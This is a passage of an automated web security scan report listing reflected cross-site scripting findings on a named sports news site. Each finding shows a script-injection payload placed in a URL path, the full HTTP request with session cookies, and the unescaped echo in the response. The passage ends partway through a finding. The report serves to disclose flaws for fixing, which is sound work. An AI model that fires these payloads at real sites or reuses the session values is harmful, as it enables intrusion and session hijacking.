<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Robinson-at-point-guard-will-be-a-learni/landing_celtics.htmldb6a8<script>alert(1)</script>f71ddd8b509"</strong>
...[SNIP]...

2.336. http://www.csnne.com/12/17/10/Woodhead-incognito-on-sales-floor/landing_wgs.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/17/10/Woodhead-incognito-on-sales-floor/landing_wgs.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 147a2<script>alert(1)</script>cc4a5edcaa0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Woodhead-incognito-on-sales-floor/landing_wgs.html147a2<script>alert(1)</script>cc4a5edcaa0 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:31 GMT
Content-Length: 803
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Woodhead-incognito-on-sales-floor/landing_wgs.html147a2<script>alert(1)</script>cc4a5edcaa0"</strong>
...[SNIP]...

2.337. http://www.csnne.com/12/18/10/Another-day-another-injured-Celtic/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/18/10/Another-day-another-injured-Celtic/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 21c0a<script>alert(1)</script>8b224aad3ee was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/18/10/Another-day-another-injured-Celtic/landing.html21c0a<script>alert(1)</script>8b224aad3ee HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:39 GMT
Content-Length: 800
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/18/10/Another-day-another-injured-Celtic/landing.html21c0a<script>alert(1)</script>8b224aad3ee"</strong>
...[SNIP]...

2.338. http://www.csnne.com/12/18/10/Bradley-ready-for-his-turn-with-Celtics/landing_celtics.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/18/10/Bradley-ready-for-his-turn-with-Celtics/landing_celtics.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f1452<script>alert(1)</script>0628ce0643 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/18/10/Bradley-ready-for-his-turn-with-Celtics/landing_celtics.htmlf1452<script>alert(1)</script>0628ce0643 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:37 GMT
Content-Length: 812
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/18/10/Bradley-ready-for-his-turn-with-Celtics/landing_celtics.htmlf1452<script>alert(1)</script>0628ce0643"</strong>
...[SNIP]...

2.339. http://www.csnne.com/12/18/10/Bruins-hold-on-to-defeat-Capitals-3-2/v1_landing_bruins.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/18/10/Bruins-hold-on-to-defeat-Capitals-3-2/v1_landing_bruins.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 36d62<script>alert(1)</script>9a798494810 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/18/10/Bruins-hold-on-to-defeat-Capitals-3-2/v1_landing_bruins.html36d62<script>alert(1)</script>9a798494810 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:42 GMT
Content-Length: 813
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/18/10/Bruins-hold-on-to-defeat-Capitals-3-2/v1_landing_bruins.html36d62<script>alert(1)</script>9a798494810"</strong>
...[SNIP]...

2.340. http://www.csnne.com/12/18/10/Confirmed-Red-Sox-sign-Dan-Wheeler/landing_redsox.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/18/10/Confirmed-Red-Sox-sign-Dan-Wheeler/landing_redsox.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6fd27<script>alert(1)</script>bd294f00767 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/18/10/Confirmed-Red-Sox-sign-Dan-Wheeler/landing_redsox.html6fd27<script>alert(1)</script>bd294f00767 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:39 GMT
Content-Length: 807
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/18/10/Confirmed-Red-Sox-sign-Dan-Wheeler/landing_redsox.html6fd27<script>alert(1)</script>bd294f00767"</strong>
...[SNIP]...

2.341. http://www.csnne.com/12/18/10/Felgers-Four-Keys-to-the-game/insider_felger.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/18/10/Felgers-Four-Keys-to-the-game/insider_felger.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 84b2b<script>alert(1)</script>d79d535a5e5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/18/10/Felgers-Four-Keys-to-the-game/insider_felger.html84b2b<script>alert(1)</script>d79d535a5e5 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:46 GMT
Content-Length: 802
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/18/10/Felgers-Four-Keys-to-the-game/insider_felger.html84b2b<script>alert(1)</script>d79d535a5e5"</strong>
...[SNIP]...

2.342. http://www.csnne.com/12/18/10/NE-college-basketball-results-Saturday-D/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/18/10/NE-college-basketball-results-Saturday-D/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6af4c<script>alert(1)</script>c8af04248e6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/18/10/NE-college-basketball-results-Saturday-D/landing.html6af4c<script>alert(1)</script>c8af04248e6 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:45 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/18/10/NE-college-basketball-results-Saturday-D/landing.html6af4c<script>alert(1)</script>c8af04248e6"</strong>
...[SNIP]...

2.343. http://www.csnne.com/12/18/10/NE-college-hockey-results-Saturday-Decem/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/18/10/NE-college-hockey-results-Saturday-Decem/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9f5ec<script>alert(1)</script>7fda45d1264 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/18/10/NE-college-hockey-results-Saturday-Decem/landing.html9f5ec<script>alert(1)</script>7fda45d1264 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:45 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/18/10/NE-college-hockey-results-Saturday-Decem/landing.html9f5ec<script>alert(1)</script>7fda45d1264"</strong>
...[SNIP]...

2.344. http://www.csnne.com/12/18/10/Not-feeling-himself-Thomas-saves-day-for/v1_landing_bruins.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/18/10/Not-feeling-himself-Thomas-saves-day-for/v1_landing_bruins.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f7e1<script>alert(1)</script>913944f674d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/18/10/Not-feeling-himself-Thomas-saves-day-for/v1_landing_bruins.html5f7e1<script>alert(1)</script>913944f674d HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:47 GMT
Content-Length: 816
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/18/10/Not-feeling-himself-Thomas-saves-day-for/v1_landing_bruins.html5f7e1<script>alert(1)</script>913944f674d"</strong>
...[SNIP]...

2.345. http://www.csnne.com/12/18/10/Not-feeling-himself-Thomas-saves-the-day/v1_landing_bruins.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/18/10/Not-feeling-himself-Thomas-saves-the-day/v1_landing_bruins.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8d65e<script>alert(1)</script>f9c2848c54d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/18/10/Not-feeling-himself-Thomas-saves-the-day/v1_landing_bruins.html8d65e<script>alert(1)</script>f9c2848c54d HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:50 GMT
Content-Length: 816
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/18/10/Not-feeling-himself-Thomas-saves-the-day/v1_landing_bruins.html8d65e<script>alert(1)</script>f9c2848c54d"</strong>
...[SNIP]...

2.346. http://www.csnne.com/12/18/10/ONeals-Christmas-wish-To-play-before-the/landing_celtics.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/18/10/ONeals-Christmas-wish-To-play-before-the/landing_celtics.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1bba6<script>alert(1)</script>c492eb7ddd9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/18/10/ONeals-Christmas-wish-To-play-before-the/landing_celtics.html1bba6<script>alert(1)</script>c492eb7ddd9 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:51 GMT
Content-Length: 814
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/18/10/ONeals-Christmas-wish-To-play-before-the/landing_celtics.html1bba6<script>alert(1)</script>c492eb7ddd9"</strong>
...[SNIP]...

2.347. http://www.csnne.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f4a1a<script>alert(1)</script>d5197d4a79d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.htmlf4a1a<script>alert(1)</script>d5197d4a79d HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:50 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.htmlf4a1a<script>alert(1)</script>d5197d4a79d"</strong>
...[SNIP]...

2.348. http://www.csnne.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9ad97<script>alert(1)</script>903d94b6357 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html9ad97<script>alert(1)</script>903d94b6357 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:53 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html9ad97<script>alert(1)</script>903d94b6357"</strong>
...[SNIP]...

2.349. http://www.csnne.com/common/FB/xd_receiver.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /common/FB/xd_receiver.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ac5d<script>alert(1)</script>4474e56d302 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common5ac5d<script>alert(1)</script>4474e56d302/FB/xd_receiver.htm HTTP/1.1
Host: www.csnne.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=d4987ffea863a57509cd6a8810c955e4&extern=0&channel=http%3A%2F%2Fwww.csnne.com%2Fcommon%2FFB%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmb=262035615; __utmc=262035615; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:36:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:36:18 GMT
Connection: close
Content-Length: 769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common5ac5d<script>alert(1)</script>4474e56d302/FB/xd_receiver.htm"</strong>
...[SNIP]...

2.350. http://www.csnne.com/common/FB/xd_receiver.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /common/FB/xd_receiver.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3f72b<script>alert(1)</script>202c08465c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

